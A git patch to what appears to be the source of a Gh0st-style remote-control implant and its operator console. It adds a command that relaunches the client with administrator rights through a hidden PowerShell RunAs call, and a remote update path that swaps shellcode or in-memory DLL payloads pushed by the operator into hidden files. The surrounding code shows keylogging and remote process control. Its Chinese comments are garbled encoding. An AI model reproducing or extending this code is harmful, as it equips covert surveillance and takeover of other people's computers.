From d2b7c32206dc8943d8f7a60f79914588b5e3e4d4 Mon Sep 17 00:00:00 2001
From: yuanyuanxiang <962914132@qq.com>
Date: Wed, 30 Jul 2025 13:44:11 +0800
Subject: [PATCH] Feature: Add run client program as admin feature

---
 client/ClientDll.cpp                          |   2 +-
 client/KernelManager.cpp                      | 220 ++++++++++++++++--
 server/2015Remote/2015Remote.rc               | Bin 91256 -> 91558 bytes
 server/2015Remote/2015RemoteDlg.cpp           |  78 +++----
 server/2015Remote/2015RemoteDlg.h             |   3 +-
 server/2015Remote/2015Remote_vs2015.vcxproj   |   1 +
 .../2015Remote_vs2015.vcxproj.filters         |   1 +
 server/2015Remote/res/Bitmap/AdminRun.bmp     | Bin 0 -> 822 bytes
 server/2015Remote/resource.h                  | Bin 45820 -> 46098 bytes
 9 files changed, 236 insertions(+), 69 deletions(-)
 create mode 100644 server/2015Remote/res/Bitmap/AdminRun.bmp

diff --git a/client/ClientDll.cpp b/client/ClientDll.cpp
index 76a9dc6..d5aa1be 100644
--- a/client/ClientDll.cpp
+++ b/client/ClientDll.cpp
@@ -14,7 +14,7 @@
 // Ô¶³ÌµØÖ·
 CONNECT_ADDRESS g_SETTINGS = {
 	FLAG_GHOST, "127.0.0.1", "6543", CLIENT_TYPE_DLL, false, DLL_VERSION,
-	FALSE, Startup_DLL, PROTOCOL_SHINE, PROTO_RANDOM, RUNNING_RANDOM, {}, 
+	FALSE, Startup_DLL, PROTOCOL_HELL, PROTO_TCP, RUNNING_RANDOM, {}, 
 	0, 7057226198541618915, {}, 
 };
 
diff --git a/client/KernelManager.cpp b/client/KernelManager.cpp
index d45ec75..81bd205 100644
--- a/client/KernelManager.cpp
+++ b/client/KernelManager.cpp
@@ -1,4 +1,4 @@
-// KernelManager.cpp: implementation of the CKernelManager class.
+ï»¿// KernelManager.cpp: implementation of the CKernelManager class.
 //
 //////////////////////////////////////////////////////////////////////
 
@@ -16,7 +16,7 @@
 #include "IOCPUDPClient.h"
 #include "IOCPKCPClient.h"
 
-// UDP Ð­Òé½öÄÜÕë¶ÔÐ¡°üÊý¾Ý£¬ÇÒÊý¾ÝÃ»ÓÐÊ±Ðò¹ØÁª
+// UDP åè®®ä»…èƒ½é’ˆå¯¹å°åŒ…æ•°æ®ï¼Œä¸”æ•°æ®æ²¡æœ‰æ—¶åºå…³è”
 IOCPClient* NewNetClient(CONNECT_ADDRESS* conn, State& bExit, bool exit_while_disconnect) {
 	if (conn->protoType == PROTO_HTTPS) return NULL;
 
@@ -79,7 +79,7 @@ CKernelManager::~CKernelManager()
 	Mprintf("~CKernelManager end\n");
 }
 
-// »ñÈ¡¿ÉÓÃµÄÏß³ÌÏÂ±ê
+// èŽ·å–å¯ç”¨çš„çº¿ç¨‹ä¸‹æ ‡
 UINT CKernelManager::GetAvailableIndex() {
 	if (m_ulThreadCount < MAX_THREADNUM) {
 		return m_ulThreadCount;
@@ -106,7 +106,7 @@ BOOL WriteBinaryToFile(const char* data, ULONGLONG size, const char* name = "Ser
 		if (std::string("ServerDll.new")!=name) return TRUE;
 		DeleteFileA(path);
 	}
-	// ´ò¿ªÎÄ¼þ£¬ÒÔ¶þ½øÖÆÄ£Ê½Ð´Èë
+	// æ‰“å¼€æ–‡ä»¶ï¼Œä»¥äºŒè¿›åˆ¶æ¨¡å¼å†™å…¥
 	std::string filePath = path;
 	std::ofstream outFile(filePath, std::ios::binary);
 
@@ -116,7 +116,7 @@ BOOL WriteBinaryToFile(const char* data, ULONGLONG size, const char* name = "Ser
 		return FALSE;
 	}
 
-	// Ð´Èë¶þ½øÖÆÊý¾Ý
+	// å†™å…¥äºŒè¿›åˆ¶æ•°æ®
 	outFile.write(data, size);
 
 	if (outFile.good())
@@ -130,9 +130,9 @@ BOOL WriteBinaryToFile(const char* data, ULONGLONG size, const char* name = "Ser
 		return FALSE;
 	}
 
-	// ¹Ø±ÕÎÄ¼þ
+	// å…³é—­æ–‡ä»¶
 	outFile.close();
-	// ÉèÖÃÎÄ¼þÊôÐÔÎªÒþ²Ø
+	// è®¾ç½®æ–‡ä»¶å±žæ€§ä¸ºéšè—
 	if (SetFileAttributesA(filePath.c_str(), FILE_ATTRIBUTE_HIDDEN))
 	{
 		Mprintf("File created and set to hidden: %s\n", filePath.c_str());
@@ -224,6 +224,149 @@ DWORD WINAPI SendKeyboardRecord(LPVOID lParam) {
 	return 0xDead0001;
 }
 
+// åˆ¤æ–­ PowerShell ç‰ˆæœ¬æ˜¯å¦ >= 3.0
+bool IsPowerShellAvailable() {
+	// è®¾ç½®å¯åŠ¨ä¿¡æ¯
+	STARTUPINFO si = { sizeof(si) };
+	PROCESS_INFORMATION pi;
+	si.dwFlags = STARTF_USESHOWWINDOW;
+	si.wShowWindow = SW_HIDE; // éšè—çª—å£
+
+	// åˆ›å»ºåŒ¿åç®¡é“ä»¥æ•èŽ· PowerShell è¾“å‡º
+	SECURITY_ATTRIBUTES sa = { sizeof(sa) };
+	sa.bInheritHandle = TRUE; // ç®¡é“å¥æŸ„å¯ç»§æ‰¿
+
+	HANDLE hReadPipe, hWritePipe;
+	if (!CreatePipe(&hReadPipe, &hWritePipe, &sa, 0)) {
+		Mprintf("CreatePipe failed. Error: %d\n", GetLastError());
+		return false;
+	}
+
+	// è®¾ç½®æ ‡å‡†è¾“å‡ºå’Œé”™è¯¯è¾“å‡ºåˆ°ç®¡é“
+	si.hStdOutput = hWritePipe;
+	si.hStdError = hWritePipe;
+	si.dwFlags |= STARTF_USESTDHANDLES;
+
+	// æž„é€  PowerShell å‘½ä»¤
+	std::string command = "powershell -Command \"$PSVersionTable.PSVersion.Major\"";
+	// åˆ›å»º PowerShell è¿›ç¨‹
+	if (!CreateProcess(
+		nullptr,                      // ä¸æŒ‡å®šæ¨¡å—åï¼ˆä½¿ç”¨å‘½ä»¤è¡Œï¼‰
+		(LPSTR)command.c_str(),       // å‘½ä»¤è¡Œå‚æ•°
+		nullptr,                      // è¿›ç¨‹å¥æŸ„ä¸å¯ç»§æ‰¿
+		nullptr,                      // çº¿ç¨‹å¥æŸ„ä¸å¯ç»§æ‰¿
+		TRUE,                         // ç»§æ‰¿å¥æŸ„
+		CREATE_NO_WINDOW,             // ä¸æ˜¾ç¤ºçª—å£
+		nullptr,                      // ä½¿ç”¨çˆ¶è¿›ç¨‹çŽ¯å¢ƒå—
+		nullptr,                      // ä½¿ç”¨çˆ¶è¿›ç¨‹å·¥ä½œç›®å½•
+		&si,                          // å¯åŠ¨ä¿¡æ¯
+		&pi                           // è¿›ç¨‹ä¿¡æ¯
+	)) {
+		Mprintf("CreateProcess failed. Error: %d\n", GetLastError());
+		CloseHandle(hReadPipe);
+		CloseHandle(hWritePipe);
+		return false;
+	}
+
+	// å…³é—­ç®¡é“çš„å†™ç«¯
+	CloseHandle(hWritePipe);
+
+	// è¯»å– PowerShell è¾“å‡º
+	std::string result;
+	char buffer[128];
+	DWORD bytesRead;
+	while (ReadFile(hReadPipe, buffer, sizeof(buffer) - 1, &bytesRead, nullptr) && bytesRead > 0) {
+		buffer[bytesRead] = '\0';
+		result += buffer;
+	}
+
+	// å…³é—­ç®¡é“çš„è¯»ç«¯
+	CloseHandle(hReadPipe);
+
+	// ç­‰å¾…è¿›ç¨‹ç»“æŸ
+	WaitForSingleObject(pi.hProcess, INFINITE);
+
+	// èŽ·å–é€€å‡ºä»£ç 
+	DWORD exitCode=0;
+	if (!GetExitCodeProcess(pi.hProcess, &exitCode)) {
+		Mprintf("GetExitCodeProcess failed. Error: %d\n", GetLastError());
+		CloseHandle(pi.hProcess);
+		CloseHandle(pi.hThread);
+		return false;
+	}
+
+	// å…³é—­è¿›ç¨‹å’Œçº¿ç¨‹å¥æŸ„
+	CloseHandle(pi.hProcess);
+	CloseHandle(pi.hThread);
+
+	// è§£æžè¿”å›žçš„ç‰ˆæœ¬å·
+	if (exitCode == 0) {
+		try {
+			int version = std::stoi(result);
+			Mprintf("PowerShell version: %d\n", version);
+			return version >= 3;
+		}
+		catch (...) {
+			Mprintf("Failed to parse PowerShell version.\n");
+			return false;
+		}
+	}
+	else {
+		Mprintf("PowerShell command failed with exit code: %d\n", exitCode);
+		return false;
+	}
+}
+
+/*
+Windows 10/11: ðŸ‘‰ æ”¾å¿ƒä½¿ç”¨ï¼Œå¯ä»¥ç›´æŽ¥è¿è¡Œ
+Windows 7: å¦‚æžœ PowerShell ç‰ˆæœ¬ >= 3.0ï¼Œå¯ä»¥è¿è¡Œ; å¦åˆ™æ— æ³•ä»¥ç®¡ç†å‘˜æƒé™é‡å¯
+*/
+bool StartAdminLauncherAndExit(const char* exePath, bool admin = true) {
+	// èŽ·å–å½“å‰è¿›ç¨‹ ID
+	DWORD currentPID = GetCurrentProcessId();
+
+	// æž„é€  PowerShell å‘½ä»¤ï¼Œç­‰å¾…å½“å‰è¿›ç¨‹é€€å‡ºåŽä»¥ç®¡ç†å‘˜æƒé™å¯åŠ¨
+	std::string launcherCmd = "powershell -Command \"Start-Sleep -Seconds 1; " // ç­‰å¾… 1 ç§’ï¼Œç¡®ä¿å½“å‰è¿›ç¨‹é€€å‡º
+		"while (Get-Process -Id " + std::to_string(currentPID) + " -ErrorAction SilentlyContinue) { Start-Sleep -Milliseconds 500 }; "
+		"Start-Process -FilePath '" + std::string(exePath);
+	launcherCmd += admin ? "' -Verb RunAs\"" : "' \""; // ä»¥ç®¡ç†å‘˜æƒé™å¯åŠ¨ç›®æ ‡è¿›ç¨‹
+
+	// å¯åŠ¨éšè—çš„ cmd è¿›ç¨‹
+	STARTUPINFO si = { sizeof(si) };
+	si.dwFlags = STARTF_USESHOWWINDOW;
+	si.wShowWindow = SW_HIDE;  // éšè—çª—å£
+	PROCESS_INFORMATION pi = {};
+	Mprintf("Run: %s\n", launcherCmd.c_str());
+	if (CreateProcessA(NULL, (LPSTR)launcherCmd.c_str(), NULL, NULL, FALSE, CREATE_NO_WINDOW, NULL, NULL, &si, &pi)) {
+		Mprintf("CreateProcess to start launcher process [%d].\n", pi.dwProcessId);
+		CloseHandle(pi.hProcess);
+		CloseHandle(pi.hThread);
+		return true;
+	}
+
+	Mprintf("Failed to start launcher process.\n");
+	return false;
+}
+
+BOOL IsRunningAsAdmin()
+{
+	BOOL isAdmin = FALSE;
+	PSID administratorsGroup = NULL;
+
+	SID_IDENTIFIER_AUTHORITY NtAuthority = SECURITY_NT_AUTHORITY;
+	if (AllocateAndInitializeSid(&NtAuthority, 2, SECURITY_BUILTIN_DOMAIN_RID, DOMAIN_ALIAS_RID_ADMINS,
+		0, 0, 0, 0, 0, 0, &administratorsGroup))
+	{
+		if (!CheckTokenMembership(NULL, administratorsGroup, &isAdmin))
+		{
+			isAdmin = FALSE;
+		}
+		FreeSid(administratorsGroup);
+	}
+
+	return isAdmin;
+}
+
 VOID CKernelManager::OnReceive(PBYTE szBuffer, ULONG ulLength)
 {
 	bool isExit = szBuffer[0] == COMMAND_BYE || szBuffer[0] == SERVER_EXIT;
@@ -237,11 +380,29 @@ VOID CKernelManager::OnReceive(PBYTE szBuffer, ULONG ulLength)
 
 	switch (szBuffer[0])
 	{
+	case CMD_RUNASADMIN: {
+		char curFile[_MAX_PATH] = {};
+		GetModuleFileName(NULL, curFile, MAX_PATH);
+		if (!IsRunningAsAdmin())
+		{
+			if (IsPowerShellAvailable() && StartAdminLauncherAndExit(curFile)) {
+				g_bExit = S_CLIENT_EXIT;
+				// å¼ºåˆ¶é€€å‡ºå½“å‰è¿›ç¨‹ï¼Œå¹¶ç¨åŽä»¥ç®¡ç†å‘˜æƒé™è¿è¡Œ
+				Mprintf("CKernelManager: [%s] Restart with administrator privileges.\n", curFile);
+				Sleep(1000);
+				TerminateProcess(GetCurrentProcess(), 0xABCDEF);
+			}
+			Mprintf("CKernelManager: [%s] Restart with administrator privileges FAILED.\n", curFile);
+			break;
+		}
+		Mprintf("CKernelManager: [%s] Running with administrator privileges.\n", curFile);
+		break;
+	}
 	case CMD_AUTHORIZATION: {
 		HANDLE hMutex = OpenMutex(SYNCHRONIZE, FALSE, "MASTER.EXE");
 		hMutex = hMutex ? hMutex : OpenMutex(SYNCHRONIZE, FALSE, "YAMA.EXE");
 #ifndef _DEBUG
-		if (hMutex == NULL) { // Ã»ÓÐ»¥³âÁ¿£¬Ö÷³ÌÐò¿ÉÄÜÎ´ÔËÐÐ
+		if (hMutex == NULL) { // æ²¡æœ‰äº’æ–¥é‡ï¼Œä¸»ç¨‹åºå¯èƒ½æœªè¿è¡Œ
 			Mprintf("!!! [WARN] Master program is not running.\n");
 		}
 #endif
@@ -253,10 +414,10 @@ VOID CKernelManager::OnReceive(PBYTE szBuffer, ULONG ulLength)
 		const char* pwdHash = m_conn->pwdHash[0] ? m_conn->pwdHash : masterHash.c_str();
 		if (passCode[0] == 0) {
 			std::string devId = getDeviceID();
-			memcpy(buf + 24, buf + 12, 8); // ÏûÏ¢Ç©Ãû
-			memcpy(buf + 96, buf + 8, 4); // Ê±¼ä´Á
-			memcpy(buf + 5, devId.c_str(), devId.length());		// 16×Ö½Ú
-			memcpy(buf + 32, pwdHash, 64);						// 64×Ö½Ú
+			memcpy(buf + 24, buf + 12, 8); // æ¶ˆæ¯ç­¾å
+			memcpy(buf + 96, buf + 8, 4); // æ—¶é—´æˆ³
+			memcpy(buf + 5, devId.c_str(), devId.length());		// 16å­—èŠ‚
+			memcpy(buf + 32, pwdHash, 64);						// 64å­—èŠ‚
 			m_ClientObject->Send2Server((char*)buf, sizeof(buf));
 			Mprintf("Request for authorization update.\n");
 		} else {
@@ -283,7 +444,7 @@ VOID CKernelManager::OnReceive(PBYTE szBuffer, ULONG ulLength)
 			iniFile cfg(CLIENT_PATH);
 			auto md5 = cfg.GetStr("settings", info->Name + std::string(".md5"));
 			if (md5.empty() || md5 != info->Md5 || !m_conn->IsVerified()) {
-				// µÚÒ»¸öÃüÁîÃ»ÓÐ°üº¬DLLÊý¾Ý£¬Ðè¿Í»§¶Ë¼ì²â±¾µØÊÇ·ñÒÑ¾­ÓÐÏà¹ØDLL£¬Ã»ÓÐÔòÏòÖ÷¿ØÇëÇóÖ´ÐÐ´úÂë
+				// ç¬¬ä¸€ä¸ªå‘½ä»¤æ²¡æœ‰åŒ…å«DLLæ•°æ®ï¼Œéœ€å®¢æˆ·ç«¯æ£€æµ‹æœ¬åœ°æ˜¯å¦å·²ç»æœ‰ç›¸å…³DLLï¼Œæ²¡æœ‰åˆ™å‘ä¸»æŽ§è¯·æ±‚æ‰§è¡Œä»£ç 
 				m_ClientObject->Send2Server((char*)szBuffer, ulLength);
 				break;
 			}
@@ -370,7 +531,7 @@ VOID CKernelManager::OnReceive(PBYTE szBuffer, ULONG ulLength)
 			memcpy(&m_settings, szBuffer + 1, sizeof(MasterSettings));
 		}
 		break;
-	case COMMAND_KEYBOARD: //¼üÅÌ¼ÇÂ¼
+	case COMMAND_KEYBOARD: //é”®ç›˜è®°å½•
 		{
 			if (m_hKeyboard) {
 				CloseHandle(__CreateThread(NULL, 0, SendKeyboardRecord, m_hKeyboard->user, 0, NULL));
@@ -396,14 +557,14 @@ VOID CKernelManager::OnReceive(PBYTE szBuffer, ULONG ulLength)
 			break;
 		}
 
-	case COMMAND_SYSTEM:       //Ô¶³Ì½ø³Ì¹ÜÀí
+	case COMMAND_SYSTEM:       //è¿œç¨‹è¿›ç¨‹ç®¡ç†
 		{
 			m_hThread[m_ulThreadCount].p = new IOCPClient(g_bExit, true, MaskTypeNone, m_conn->GetHeaderEncType());
 			m_hThread[m_ulThreadCount++].h = __CreateThread(NULL, 0, LoopProcessManager, &m_hThread[m_ulThreadCount], 0, NULL);;
 			break;
 		}
 
-	case COMMAND_WSLIST:       //Ô¶³Ì´°¿Ú¹ÜÀí
+	case COMMAND_WSLIST:       //è¿œç¨‹çª—å£ç®¡ç†
 		{
 			m_hThread[m_ulThreadCount].p = new IOCPClient(g_bExit, true, MaskTypeNone, m_conn->GetHeaderEncType());
 			m_hThread[m_ulThreadCount++].h = __CreateThread(NULL,0, LoopWindowManager, &m_hThread[m_ulThreadCount], 0, NULL);;
@@ -412,7 +573,7 @@ VOID CKernelManager::OnReceive(PBYTE szBuffer, ULONG ulLength)
 
 	case COMMAND_BYE:
 		{
-			BYTE	bToken = COMMAND_BYE;// ±»¿Ø¶ËÍË³ö
+			BYTE	bToken = COMMAND_BYE;// è¢«æŽ§ç«¯é€€å‡º
 			m_ClientObject->Send2Server((char*)&bToken, 1);
 			g_bExit = S_CLIENT_EXIT;
 			Mprintf("======> Client exit \n");
@@ -421,7 +582,7 @@ VOID CKernelManager::OnReceive(PBYTE szBuffer, ULONG ulLength)
 
 	case SERVER_EXIT:
 		{
-			// Ö÷¿Ø¶ËÍË³ö
+			// ä¸»æŽ§ç«¯é€€å‡º
 			g_bExit = S_SERVER_EXIT;
 			Mprintf("======> Server exit \n");
 			break;
@@ -476,15 +637,30 @@ VOID CKernelManager::OnReceive(PBYTE szBuffer, ULONG ulLength)
 			break;
 		}
 
-	case COMMAND_UPDATE:
-		{
-			ULONGLONG size=0;
+	case COMMAND_UPDATE:{
+		auto typ = m_conn->ClientType();
+		if (typ == CLIENT_TYPE_DLL || typ == CLIENT_TYPE_MODULE) {
+			ULONGLONG size = 0;
 			memcpy(&size, (const char*)szBuffer + 1, sizeof(ULONGLONG));
 			if (WriteBinaryToFile((const char*)szBuffer + 1 + sizeof(ULONGLONG), size)) {
 				g_bExit = S_CLIENT_UPDATE;
 			}
-			break;
+		}else if (typ == CLIENT_TYPE_SHELLCODE || typ == CLIENT_TYPE_MEMDLL) {
+			char curFile[_MAX_PATH] = {};
+			GetModuleFileName(NULL, curFile, MAX_PATH);
+			if (IsPowerShellAvailable() && StartAdminLauncherAndExit(curFile, false)) {
+				g_bExit = S_CLIENT_UPDATE;
+				// å¼ºåˆ¶é€€å‡ºå½“å‰è¿›ç¨‹ï¼Œå¹¶é‡æ–°å¯åŠ¨ï¼›è¿™ä¼šè§¦å‘é‡æ–°èŽ·å– Shell code ä»Žè€Œåšåˆ°è½¯ä»¶å‡çº§
+				Mprintf("CKernelManager: [%s] Will be updated.\n", curFile);
+				Sleep(1000);
+				TerminateProcess(GetCurrentProcess(), 0xABCDEF);
+			}
+			Mprintf("CKernelManager: [%s] Update FAILED.\n", curFile);
+		} else {
+			Mprintf("=====> å®¢æˆ·ç«¯ç±»åž‹'%d'ä¸æ”¯æŒæ–‡ä»¶å‡çº§\n", typ);
 		}
+		break;
+	}
 
 	default:
 		{
diff --git a/server/2015Remote/2015Remote.rc b/server/2015Remote/2015Remote.rc
index 3282a67f4326c17f3d70cbb8d0caa1c961efb8a3..995d327686a4dd4d1353992fac746247e28749fc 100644
GIT binary patch
delta 111
zcmexyf_2$x)`l&Nix}B2Bs-^H==YhN_}g^)23AH9;UI=k20w;)21kZqFzLeJJKa!%
zQFr?yM#eI;=^G3f#ima%XJp~_W$*+l1S_A;XwDePo5GOGkjan-6e?xNoBmOoQFyzA
I1!IB^0FP51tN;K2

delta 27
jcmZ2>n)SyC)`l&Nix{^XF)@~zO_q4FVf!~r#tqs4sOJl<

diff --git a/server/2015Remote/2015RemoteDlg.cpp b/server/2015Remote/2015RemoteDlg.cpp
index a7cf460..b863ed3 100644
--- a/server/2015Remote/2015RemoteDlg.cpp
+++ b/server/2015Remote/2015RemoteDlg.cpp
@@ -311,6 +311,7 @@ CMy2015RemoteDlg::CMy2015RemoteDlg(CWnd* pParent): CDialogEx(CMy2015RemoteDlg::I
 	m_bmOnline[11].LoadBitmap(IDB_BITMAP_UNAUTH);
 	m_bmOnline[12].LoadBitmap(IDB_BITMAP_ASSIGNTO);
 	m_bmOnline[13].LoadBitmap(IDB_BITMAP_ADDWATCH);
+	m_bmOnline[14].LoadBitmap(IDB_BITMAP_ADMINRUN);
 
 	for (int i = 0; i < PAYLOAD_MAXTYPE; i++) {
 		m_ServerDLL[i] = nullptr;
@@ -430,6 +431,7 @@ BEGIN_MESSAGE_MAP(CMy2015RemoteDlg, CDialogEx)
 	ON_NOTIFY(NM_CUSTOMDRAW, IDC_MESSAGE, &CMy2015RemoteDlg::OnNMCustomdrawMessage)
 	ON_COMMAND(ID_ONLINE_ADD_WATCH, &CMy2015RemoteDlg::OnOnlineAddWatch)
 	ON_NOTIFY(NM_CUSTOMDRAW, IDC_ONLINE, &CMy2015RemoteDlg::OnNMCustomdrawOnline)
+	ON_COMMAND(ID_ONLINE_RUN_AS_ADMIN, &CMy2015RemoteDlg::OnOnlineRunAsAdmin)
 END_MESSAGE_MAP()
 
 
@@ -1298,6 +1300,7 @@ void CMy2015RemoteDlg::OnNMRClickOnline(NMHDR *pNMHDR, LRESULT *pResult)
 	Menu.SetMenuItemBitmaps(ID_ONLINE_UNAUTHORIZE, MF_BYCOMMAND, &m_bmOnline[11], &m_bmOnline[11]);
 	Menu.SetMenuItemBitmaps(ID_ONLINE_ASSIGN_TO, MF_BYCOMMAND, &m_bmOnline[12], &m_bmOnline[12]);
 	Menu.SetMenuItemBitmaps(ID_ONLINE_ADD_WATCH, MF_BYCOMMAND, &m_bmOnline[13], &m_bmOnline[13]);
+	Menu.SetMenuItemBitmaps(ID_ONLINE_RUN_AS_ADMIN, MF_BYCOMMAND, &m_bmOnline[14], &m_bmOnline[14]);
 
 	std::string masterHash(GetMasterHash());
 	if (GetPwdHash() != masterHash || m_superPass.empty()) {
@@ -1353,59 +1356,22 @@ void CMy2015RemoteDlg::OnOnlineMessage()
 	SendSelectedCommand(&bToken, sizeof(BYTE));
 }
 
-char* ReadFileToMemory(const CString& filePath, ULONGLONG &fileSize) {
-	fileSize = 0;
-	try {
-		// æ‰“å¼€æ–‡ä»¶ï¼ˆåªè¯»æ¨¡å¼ï¼‰
-		CFile file(filePath, CFile::modeRead | CFile::typeBinary);
-
-		// èŽ·å–æ–‡ä»¶å¤§å°
-		fileSize = file.GetLength();
-
-		// åˆ†é…å†…å­˜ç¼“å†²åŒº: å¤´+æ–‡ä»¶å¤§å°+æ–‡ä»¶å†…å®¹
-		char* buffer = new char[1 + sizeof(ULONGLONG) + static_cast<size_t>(fileSize) + 1];
-		if (!buffer) {
-			return NULL;
-		}
-		memcpy(buffer+1, &fileSize, sizeof(ULONGLONG));
-		// è¯»å–æ–‡ä»¶å†…å®¹åˆ°ç¼“å†²åŒº
-		file.Read(buffer + 1 + sizeof(ULONGLONG), static_cast<UINT>(fileSize));
-		buffer[1 + sizeof(ULONGLONG) + fileSize] = '\0'; // æ·»åŠ å­—ç¬¦ä¸²ç»“æŸç¬¦
-
-		// é‡Šæ”¾å†…å­˜
-		return buffer;
-	}
-	catch (CFileException* e) {
-		// æ•èŽ·æ–‡ä»¶å¼‚å¸¸
-		TCHAR errorMessage[256];
-		e->GetErrorMessage(errorMessage, 256);
-		e->Delete();
-		return NULL;
-	}
-
-}
-
 void CMy2015RemoteDlg::OnOnlineUpdate()
 {
 	if (IDYES != MessageBox(_T("ç¡®å®šå‡çº§é€‰å®šçš„è¢«æŽ§ç¨‹åºå—?\néœ€å—æŽ§ç¨‹åºæ”¯æŒæ–¹å¯ç”Ÿæ•ˆ!"), 
 		_T("æç¤º"), MB_ICONQUESTION | MB_YESNO))
 		return;
 
-	char path[_MAX_PATH], * p = path;
-	GetModuleFileNameA(NULL, path, sizeof(path));
-	while (*p) ++p;
-	while ('\\' != *p) --p;
-	strcpy(p + 1, "ServerDll.dll");
-	ULONGLONG fileSize = 0;
-	char *buffer = ReadFileToMemory(path, fileSize);
+	Buffer* buf = m_ServerDLL[PAYLOAD_DLL_X64];
+	ULONGLONG fileSize = buf->length(true) - 6;
+	PBYTE buffer = new BYTE[fileSize + 9];
 	if (buffer) {
 		buffer[0] = COMMAND_UPDATE;
-		SendSelectedCommand((PBYTE)buffer, 1 + sizeof(ULONGLONG) + fileSize + 1);
+		memcpy(buffer + 1, &fileSize, 8);
+		memcpy(buffer + 9, buf->c_str() + 6, fileSize);
+		SendSelectedCommand((PBYTE)buffer, 9 + fileSize);
 		delete[] buffer;
 	}
-	else {
-		MessageBox("è¯»å–æ–‡ä»¶å¤±è´¥: "+ CString(path), "æç¤º");
-	}
 }
 
 void CMy2015RemoteDlg::OnOnlineDelete()
@@ -1614,8 +1580,13 @@ VOID CMy2015RemoteDlg::SendSelectedCommand(PBYTE  szBuffer, ULONG ulLength)
 		context* ContextObject = (context*)m_CList_Online.GetItemData(iItem);
 		if (!ContextObject->IsLogin() && szBuffer[0] != COMMAND_BYE)
 			continue;
-
-		// å‘é€èŽ·å¾—é©±åŠ¨å™¨åˆ—è¡¨æ•°æ®åŒ…
+		if (szBuffer[0] == COMMAND_UPDATE) {
+			CString data = ContextObject->GetClientData(ONLINELIST_CLIENTTYPE);
+			if (data == "SC" || data == "MDLL") {
+				ContextObject->Send2Client(szBuffer, 1);
+				continue;
+			}
+		}
 		ContextObject->Send2Client(szBuffer, ulLength);
 	} 
 	LeaveCriticalSection(&m_cs);
@@ -3112,3 +3083,20 @@ void CMy2015RemoteDlg::OnNMCustomdrawOnline(NMHDR* pNMHDR, LRESULT* pResult)
 	}
 	}
 }
+
+
+void CMy2015RemoteDlg::OnOnlineRunAsAdmin()
+{
+	if (MessageBoxA("ç¡®å®šè¦ä»¥ç®¡ç†å‘˜æƒé™é‡æ–°å¯åŠ¨ç›®æ ‡åº”ç”¨ç¨‹åºå—?\næ­¤æ“ä½œå¯èƒ½è§¦å‘ UAC è´¦æˆ·æŽ§åˆ¶ã€‚",
+		"æç¤º", MB_ICONQUESTION | MB_YESNO) == IDYES) {
+		EnterCriticalSection(&m_cs);
+		POSITION Pos = m_CList_Online.GetFirstSelectedItemPosition();
+		while (Pos) {
+			int	iItem = m_CList_Online.GetNextSelectedItem(Pos);
+			context* ContextObject = (context*)m_CList_Online.GetItemData(iItem);
+			BYTE token = CMD_RUNASADMIN;
+			ContextObject->Send2Client(&token, sizeof(token));
+		}
+		LeaveCriticalSection(&m_cs);
+	}
+}
diff --git a/server/2015Remote/2015RemoteDlg.h b/server/2015Remote/2015RemoteDlg.h
index ce4e1c4..32c7bd6 100644
--- a/server/2015Remote/2015RemoteDlg.h
+++ b/server/2015Remote/2015RemoteDlg.h
@@ -204,7 +204,7 @@ public:
 	CRITICAL_SECTION m_cs;
 	BOOL       isClosed;
 	CMenu	   m_MainMenu;
-	CBitmap m_bmOnline[14];
+	CBitmap m_bmOnline[15];
 	uint64_t m_superID;
 	bool CheckValid(int trail = 14);
 	afx_msg void OnTimer(UINT_PTR nIDEvent);
@@ -280,4 +280,5 @@ public:
 	afx_msg void OnNMCustomdrawMessage(NMHDR* pNMHDR, LRESULT* pResult);
 	afx_msg void OnOnlineAddWatch();
 	afx_msg void OnNMCustomdrawOnline(NMHDR* pNMHDR, LRESULT* pResult);
+	afx_msg void OnOnlineRunAsAdmin();
 };
diff --git a/server/2015Remote/2015Remote_vs2015.vcxproj b/server/2015Remote/2015Remote_vs2015.vcxproj
index 5f5e35d..2a59802 100644
--- a/server/2015Remote/2015Remote_vs2015.vcxproj
+++ b/server/2015Remote/2015Remote_vs2015.vcxproj
@@ -390,6 +390,7 @@
   </ItemGroup>
   <ItemGroup>
     <Image Include="res\Bitmap\AddWatch.bmp" />
+    <Image Include="res\Bitmap\AdminRun.bmp" />
     <Image Include="res\Bitmap\AssignTo.bmp" />
     <Image Include="res\Bitmap\authorize.bmp" />
     <Image Include="res\Bitmap\DxgiDesktop.bmp" />
diff --git a/server/2015Remote/2015Remote_vs2015.vcxproj.filters b/server/2015Remote/2015Remote_vs2015.vcxproj.filters
index 7ff3b73..2314989 100644
--- a/server/2015Remote/2015Remote_vs2015.vcxproj.filters
+++ b/server/2015Remote/2015Remote_vs2015.vcxproj.filters
@@ -155,6 +155,7 @@
     <Image Include="res\DrawingBoard.ico" />
     <Image Include="res\Bitmap\AssignTo.bmp" />
     <Image Include="res\Bitmap\AddWatch.bmp" />
+    <Image Include="res\Bitmap\AdminRun.bmp" />
   </ItemGroup>
   <ItemGroup>
     <None Include="..\..\Release\ghost.exe" />
diff --git a/server/2015Remote/res/Bitmap/AdminRun.bmp b/server/2015Remote/res/Bitmap/AdminRun.bmp
new file mode 100644
index 0000000000000000000000000000000000000000..d664f261ac9995a39664b6d5769f677550d6894a
GIT binary patch
literal 822
zcmZ?rHDhJ~12Z700mK4O%*Y@C7H5FULpTuf|Bny25VA64#hBtik^1_2uEq-fBRh~0
zP#kD@OH0dNYyha9;s1X)0&1kLdZ2+oE07U>^Z)<<4{{O%14Ii%F&_8B)gu_-z{KTW
zpfZR`h%NA7$E6-Q%z(j5l6tt~@wgw^d^Gjf@)+<VH1)Io|A!!;F05<{)dPbFKR`Ag
I9#F(E0IrBEU;qFB

literal 0
HcmV?d00001

diff --git a/server/2015Remote/resource.h b/server/2015Remote/resource.h
index 151f5a064746c0aa7720c0e3c1d5fe206c339f48..51a0dc46c072c9e1609c90ce1d949f3013534b4d 100644
GIT binary patch
delta 123
zcmezKlxflnrVWp5CI?su@W(SaGPp4KGI%ohF$6J$PJS39J9*zmsmTQ*9GjonY$~3t
zB`Y%d!+MFypZHZKH>_csEVoHw@`r8_ZlGeI7LfMf$*&s~L2}H7491%$Z_sC)?6OvD
Va@|Ie$!|8AOn$@yVS8=b1ON|)FCYK_

delta 47
zcmV+~0MP%E=mPxZ0<hvdlYj^Wvp_wvbF;3oDgl#{vnrEdvjmd{voMoNu@;l=vKW(O
Fv#uQH7ES;F